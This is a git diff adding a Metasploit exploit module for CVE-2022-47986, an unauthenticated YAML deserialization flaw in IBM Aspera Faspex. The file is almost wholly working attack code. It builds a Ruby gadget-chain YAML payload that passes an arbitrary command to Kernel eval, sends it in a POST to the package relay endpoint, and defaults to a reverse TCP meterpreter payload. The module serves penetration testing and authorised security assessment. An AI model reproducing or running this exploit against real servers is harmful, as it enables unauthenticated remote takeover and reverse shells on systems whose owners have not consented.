diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb new file mode 100644 index 000000000000..0f114506cc30 --- /dev/null +++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb @@ -0,0 +1,134 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability', + 'Description' => %q{ + This module exploits an unauthenticated YAML deserialization vulnerability + which exists in IBM Aspera Faspex version 4.4.2 Patch Level 1 and below (CVE-2022-47986). + }, + 'References' => [ + ['CVE', '2022-47986'], + ['URL', 'https://www.ibm.com/support/pages/node/6952319'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'], + ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'], + ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'], + ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis'], + ], + 'Author' => [ + 'ohnonoyesyes', # POC + 'Maurice LAMBERT', # Metasploit auxiliary module + ], + 'DisclosureDate' => '2023-02-02', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true + }, + 'Targets' => [ + [ + 'Unix Command', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp', + 'RPORT' => 9000 + } + } + ], + ], + 'CmdStagerFlavor' => [ 'echo' ], + 'Payload' => { 'BadChars' => '`' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + ) + ) + register_options( + [OptString.new('TARGETURI', [ false, 'The base path for the IBM Aspera Faspex Application.', '/aspera/faspex'])] + ) + end + + def execute_command(command, _opts = {}) + exploit = <<~EOT + --- + - !ruby/object:Gem::Installer + i: x + - !ruby/object:Gem::SpecFetcher + i: y + - !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "pew" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:PrettyPrint + output: !ruby/object:Net::WriteAdapter + socket: &1 !ruby/module "Kernel" + method_id: :eval + newline: "throw `#{command}`" + buffer: {} + group_stack: + - !ruby/object:PrettyPrint::Group + break: true + method_id: :breakable + EOT + uuid = SecureRandom.uuid + + payload = { + "package_file_list[]": '/', + external_emails: exploit, + package_name: 'assetnote_pack', + package_note: Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15).to_s, + original_sender_name: Rex::Text.rand_name.to_s, + package_uuid: uuid.to_s, + metadata_human_readable: 'Yes', + forward: 'pew', + metadata_json: '{}', + delivery_uuid: uuid.to_s, + delivery_sender_name: Rex::Text.rand_name.to_s, + delivery_title: Rex::Text.rand_text_alphanumeric(4).to_s, + delivery_note: Rex::Text.rand_text_alphanumeric(12).to_s, + delete_after_download: true, + delete_after_download_condition: 'IDK' + } + + response = send_request_raw({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['TARGETURI'], '/package_relay/relay_package'), + 'data' => URI.encode_www_form(payload) + }) + if response && response.body + return response.body + end + + false + end + + def exploit + print_status('Exploiting...') + execute_command(payload.encoded) + end +end